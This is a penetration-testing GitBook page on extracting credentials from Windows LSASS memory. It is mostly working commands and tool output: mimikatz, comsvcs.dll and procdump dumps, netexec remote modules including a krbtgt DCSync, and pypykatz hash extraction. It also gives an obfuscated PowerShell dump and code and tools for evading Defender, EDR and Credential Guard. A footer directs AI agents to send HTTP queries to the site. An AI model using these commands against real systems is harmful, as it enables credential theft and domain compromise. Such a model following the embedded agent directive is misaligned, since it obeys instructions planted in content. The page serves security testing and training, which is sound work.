# LSASS secrets [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) {% hint style="warning" %} *Require Domain Admin or Local Admin Privileges on target* {% endhint %}

## In modern OS On the latest versions of Windows, mimikatz becomes useless when you try to dump LSASS. This happens because there is no longer anything valuable left in LSASS. All secrets are stored in a separate protected process, lsaiso.exe. This protection mechanism is called Credential Guard, and it is enabled by default starting with Windows 22H2 / Windows Server 2025. But there is a “bypass” that abuses Remote Credential Guard, which is normally used during RDP sessions to avoid sending credentials to a remote server, and retrieve all NTLMv1 hashes despite the protection being enabled {% embed url="" %} ## Task Manager Method

```cmd-session C:\htb> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # log Using 'mimikatz.log' for logfile : OK mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP : 'lsass.dmp' mimikatz # sekurlsa::logonpasswords Opening : 'lsass.dmp' file for minidump... Authentication Id : 0 ; 23196355 (00000000:0161f2c3) Session : Interactive from 4 User Name : DWM-4 Domain : Window Manager Logon Server : (null) Logon Time : 3/31/2021 3:00:57 PM SID : S-1-5-90-0-4 msv : tspkg : wdigest : * Username : WINLPE-SRV01$ * Domain : WORKGROUP * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 23026942 (00000000:015f5cfe) Session : RemoteInteractive from 2 User Name : jordan Domain : WINLPE-SRV01 Logon Server : WINLPE-SRV01 Logon Time : 3/31/2021 2:59:52 PM SID : S-1-5-21-3769161915-3336846931-3985975925-1000 msv : [00000003] Primary * Username : jordan * Domain : WINLPE-SRV01 * NTLM : cf3a5525ee9414229e66279623ed5c58 * SHA1 : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2 tspkg : wdigest : * Username : jordan * Domain : WINLPE-SRV01 * Password : (null) kerberos : * Username : jordan * Domain : WINLPE-SRV01 * Password : (null) ssp : credman : ``` {% content-ref url="../post-exploitation/lateral-movement/pass-the-hash-pth" %} [pass-the-hash-pth](https://0xss0rz.gitbook.io/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-hash-pth) {% endcontent-ref %} ## Mimikatz ``` Invoke-Mimikatz -Command '"sekurlsa::ekeys"' ``` ## SafetyKatz {% embed url="" %} ``` SafetyKatz.exe "sekurlsa::ekeys" ``` ## BetterSafetyKatz {% embed url="" %} ## SharpKatz {% embed url="" %} ``` SharpKatz.exe --Command ekeys ``` ## Dumpert (Direct Syscalls and API unhooking) {% embed url="" %} ``` rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump ``` ## Rundll32.exe & Comsvcs.dll Method ``` tasklist /FI "IMAGENAME eq lsass.exe" rundll32.exe C:\windows\System32\comsvcs.dll, Minidump C:\Users\Public\lsass.dmp full ``` LSASS PID in cmd: `tasklist /svc` ```cmd-session C:\Windows\system32> tasklist /svc Image Name PID Services ========================= ======== ============================================ System Idle Process 0 N/A System 4 N/A Registry 96 N/A smss.exe 344 N/A csrss.exe 432 N/A wininit.exe 508 N/A csrss.exe 520 N/A winlogon.exe 580 N/A services.exe 652 N/A lsass.exe 672 KeyIso, SamSs, VaultSvc svchost.exe 776 PlugPlay svchost.exe 804 BrokerInfrastructure, DcomLaunch, Power, SystemEventsBroker fontdrvhost.exe 812 N/A ``` LSASS PID in powershell: `Get-Process lsass` ```powershell-session PS C:\Windows\system32> Get-Process lsass Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 1260 21 4948 15396 2.56 672 0 lsass ``` LSASS dump: ```powershell-session PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full ``` **Transfer dump** {% content-ref url="../file-transfer/download-exfiltration" %} [download-exfiltration](https://0xss0rz.gitbook.io/0xss0rz/pentest/file-transfer/download-exfiltration) {% endcontent-ref %} Transfer over SMB - as for SAM secrets {% content-ref url="sam-and-lsa-secrets" %} [sam-and-lsa-secrets](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/sam-and-lsa-secrets) {% endcontent-ref %} ## Exctract Credentials ```shell-session $ pypykatz lsa minidump /home/peter/Documents/lsass.dmp INFO:root:Parsing file /home/peter/Documents/lsass.dmp FILE: ======== /home/peter/Documents/lsass.dmp ======= == LogonSession == authentication_id 1354633 (14ab89) session_id 2 username bob domainname DESKTOP-33E7O54 logon_server WIN-6T0C3J2V6HP logon_time 2021-12-14T18:14:25.514306+00:00 sid S-1-5-21-4019466498-1700476312-3544718034-1001 luid 1354633 == MSV == Username: bob Domain: DESKTOP-33E7O54 LM: NA NT: 64f12cddaa88057e06a81b54e73b949b SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8 DPAPI: NA == WDIGEST [14ab89]== username bob domainname DESKTOP-33E7O54 password None password (hex) == Kerberos == Username: bob Domain: DESKTOP-33E7O54 == WDIGEST [14ab89]== username bob domainname DESKTOP-33E7O54 password None password (hex) == DPAPI [14ab89]== luid 1354633 key_guid 3e1d1091-b792-45df-ab8e-c66af044d69b masterkey e8bc2faf77e7bd1891c0e49f0dea9d447a491107ef5b25b9929071f68db5b0d55bf05df5a474d9bd94d98be4b4ddb690e6d8307a86be6f81be0d554f195fba92 sha1_masterkey 52e758b6120389898f7fae553ac8172b43221605 ... SNIP ... ``` ## Netexec - CME - Remotely {% embed url="" %} ``` nxc smb 192.168.255.131 -u administrator -p pass -M lsassy ``` ``` nxc smb 192.168.255.131 -u administrator -p pass -M nanodump ``` ``` nxc smb 192.168.255.131 -u administrator -p pass -M mimikatz ``` ``` nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt" ``` SMB Module handlekatz: `[*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz` SMB module procdump: `[*] procdump Get lsass dump using procdump64 and parse the result with pypykatz` ## Procdump See: ```cmd-session C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp ProcDump v10.0 - Sysinternals process dump utility Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com [15:25:45] Dump 1 initiated: C:\Tools\Procdump\lsass.dmp [15:25:45] Dump 1 writing: Estimated dump file size is 42 MB. [15:25:45] Dump 1 complete: 43 MB written in 0.5 seconds [15:25:46] Dump count reached. ``` Load in Mimikatz and Pass The Hash - See [Task Manager Method](#task-manager-method) ## TrickDump {% embed url="" %} ## MultiDump {% embed url="" %} ## Obfuscated LSASS Dump ```powershell PS C:> start-job { cd e:; while ($true) { cp dmp.log dmp.log2;}} PS E:> &$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % { $_.FullName }), `#-99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full; Wait-Process -Id (Get-Process rundll32).id ; ```

``` &$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % { $_.FullName }), `#-999999999999999999999999999999999999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999999999999 999999999999999999999999976-decoy $(gps l?a*s).id dmp.tmp full; Wait-Process -Id (Get-Process rundll32).id ; (Get-Item -Path E:\dmp.tmp).Encrypt(); ```

Parse dump {% embed url="" %} {% embed url="" %} ## RustiveDump {% embed url="" %} ## LsassReflectDumping {% embed url="" %} ## RtlCreateProcessReflection {% embed url="" %} ## ShadowDumper {% embed url="" %}

## MiniDumpDotNet {% embed url="" %} ``` .\minidumpdotnet.exe ``` `tasklist /v` to enumerate LSASS PID is detected by EDR FindLSASSPID.cpp ```cpp // Find PID of a process by name int FindPID(const char* procname) { int pid= 0; PROCESSENTRY32 proc = {}; proc.dwSize= sizeof(PROCESSENTRY32); HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);bool bProc= Process32First(snapshot, &proc); while (bProc) { if (strcmp(procname, proc.szExeFile) == 0) { pid= proc.th32ProcessID; break; } bProc= Process32Next(snapshot, &proc); } return pid; } ``` ## Nanodump {% embed url="" %} ## POSTDump {% embed url="" %} ## Powershell - Bypass Defender for Endpoint {% embed url="" %} ```powershell function Write-MemoryDump { param( [string]$outputPath ) $processId = Get-ProcessId if (-not $processId) { return $false } try { # Open target process $processHandle = [System.Diagnostics.Process]::GetProcessById($processId).Handle if (-not $processHandle) { Write-Host “Failed to open target process with PID: $processId” return $false } Write-Host “Successfully opened target process with PID: $processId” # Create dump file $fileStream = [System.IO.File]::Open($outputPath, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write) $fileHandle = $fileStream.SafeFileHandle.DangerousGetHandle() Write-Host “Dump file created at $outputPath” # Write memory dump $success = [DumpGenerator]::MiniDumpWriteDump( $processHandle, [uint32]$processId, $fileHandle, [uint32]$FullMemoryDump, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero ) # Close file stream and release process handle $fileStream.Close() [System.Runtime.InteropServices.Marshal]::Release($processHandle) if ($success) { Write-Host “Memory dump successfully written to $outputPath” return $true } else { Write-Host “Failed to write memory dump.” return $false } } catch { Write-Host “An error occurred: $_” return $false } } ``` ## Lsass-Shtinkering {% hint style="info" %} *Works on Windows 10, Server 2022 - Not working on Server 2019* {% endhint %} {% embed url="" %} ## Go-lsass {% embed url="" %} ## Blindsight {% embed url="" %} ## AxiomDumper {% embed url="" %} ## Bypass Credential Guard **Credential Guard** is a virtualization-based isolation technology for **LSASS which prevents attackers from stealing credentials** that could be used for pass the hash attacks. {% embed url="" %} ``` NativeBypassCredGuard.exe patch true ``` Then run your LSASS dump ## LSASS Forked Dump - Bypass Crowdstrike EDR {% embed url="" %} ## Morpheus Extracts lsass.exe in RAM and exfiltrates it via forged NTP packets. {% embed url="" %} ## Doppelganger - LSASS Dumper with Process Cloning {% embed url="" %} {% embed url="" %} ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## KslDump Extraction of credentials from PPL-protected LSASS using only Microsoft-signed components {% embed url="" %} ## Interesting Book {% content-ref url="../../interesting-books" %} [interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books) {% endcontent-ref %} {% hint style="info" %} ***Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.* {% endhint %} * [**Pentesting Active Directory and Windows-based Infrastructure**](https://www.amazon.fr/dp/1804611360?tag=0xss0rz-21)\ Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations * [**Infrastructure Attack Strategies for Ethical Hacking**](https://www.amazon.fr/dp/8196994729?tag=0xss0rz-21)\ Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory. * [**RTFM: Red Team Field Manual v2**](https://www.amazon.fr/dp/1075091837?tag=0xss0rz-21)\ A quick reference when there is no time to scour the Internet for that perfect command * [**Red Team Development and Operations: A practical guide**](https://www.amazon.fr/dp/B0842BMMCC?tag=0xss0rz-21)\ The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide. * [**Cybersecurity Attacks – Red Team Strategies**](https://www.amazon.fr/dp/B0822G9PTM?tag=0xss0rz-21)\ A practical guide to building a penetration testing program having homefield advantage ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/lsass-secrets.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.